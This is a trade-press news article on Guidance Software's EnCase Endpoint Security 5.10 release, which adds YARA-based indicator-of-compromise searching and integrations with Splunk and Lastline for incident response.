Guidance Teams with Splunk & Lastline For Faster, Smarter Incident Response

Guidance Software is fortifying its endpoint detection and response with a new release of EnCase Endpoint Security, as well as new partnerships and deep integration with Splunk and Lastline. The goal is to cut time and complexity for threat detection and prevention.

Tags: alerts, analytics, cybersecurity, EnCase, endpoint security, forensics, Guidance, incident response, intrusion, Lastline, malware, Splunk, threat detection, YARA,

Guidance Software is fortifying its endpoint detection and response with a new release of EnCase Endpoint Security, as well as new partnerships and deep integration with Splunk and Lastline.


Guidance hopes all these efforts will reduce the time required by security teams to triage and validate alerts from a rapidly growing number of internal security tools and external threat-intelligence sources, according to Roger Angarita, Guidance’s director of product management.


“Security teams cannot tolerate inefficiency in their daily activities. We’ve worked to solve this by increasing interoperability between the tools they use most often and by delivering fast access to trusted endpoint data.  Our customers demand continuous innovation that meets them right where they live and work,” Angarita said in a statement.


The latest update to EnCase Endpoint Security (v5.10) can better synthesize workflow for security teams, and in turn let those teams search for known IOCs (Indicator of Compromise) and identify threats validated by internal or external industry sources.   This improvement comes thanks to EnCase’s newly-added support for the IOC searching of YARA rules. YARA is a tool helping malware researchers identify and classify malware samples.


This focus on quicker and more accurate detection is also augmented through its partnerships with Splunk and Landline.  In specific:

  • Integration with Splunk Enterprise to collect and present trusted endpoint telemetry automatically when a security alert is generated, ensuring faster decisions and a dramatic reduction in false positives for security teams.
  • File reputation checking from malwave protection vendor Lastline, allowing security analysts to validate threat artifacts of suspect files directly within EnCase, accelerating the decision process.

Michael Harris, Guidance’s chief marketing officer, highlighted the increasing importance endpoint security plays in today’s new ‘extended enterprise’ architectures in a recent blog post:

Many organizations—in both private and public sectors—house extremely sensitive data. High-value data is ideally confined to properly fortified servers, and tightly sealed off with aggressive whitelisting and rigorous audits. Multi-factor authentication and strong passwords are critical, and there’s a new tactic that becomes more crucial with every hack we learn about: active, ongoing anomaly hunting.

Sensitive data tends to congregate on network endpoints such as laptops and servers, and it has a habit of multiplying into errant, unauthorized copies in unauthorized storage locations. For that reason, it’s essential for today’s security teams to create and regularly update baselines of normal activity for each endpoint that houses sensitive data, and to then actively watch for signs of anomalous behavior against those baselines.

One cybersecurity analyst, Enterprise Strategy Group’s Doug Cahill, said the Guidance steps help fill a gap in threat detection and response.  “Incident response teams need open standards in order to bring the most power to bear in their daily work,” Cahill said.  He added that enabling IOCs in a standardized and actionable format is a “big step” in promoting endpoint detection and response functionality.


In total, EnCase Endpoint Security 5.10 delivers capabilities to cybersecurity teams to let them more easily:

  • Create an asset list and verify system details of connected endpoints
  • Verify security policies are not being evaded by rogue processes or users
  • Identify visibility issues by other security technologies
  • Integrate with alerting technologies to capture time sensitive data for analysis
  • Increase efficiency through response automation and scheduled actions
  • Drastically decrease alert validation times
  • Provide automated and manual incident response by the leader in digital forensic solutions
  • Centralize homegrown scripts into a single solution with greater access to endpoint activity
  • Audit sensitive data, identify and securely erase document based risk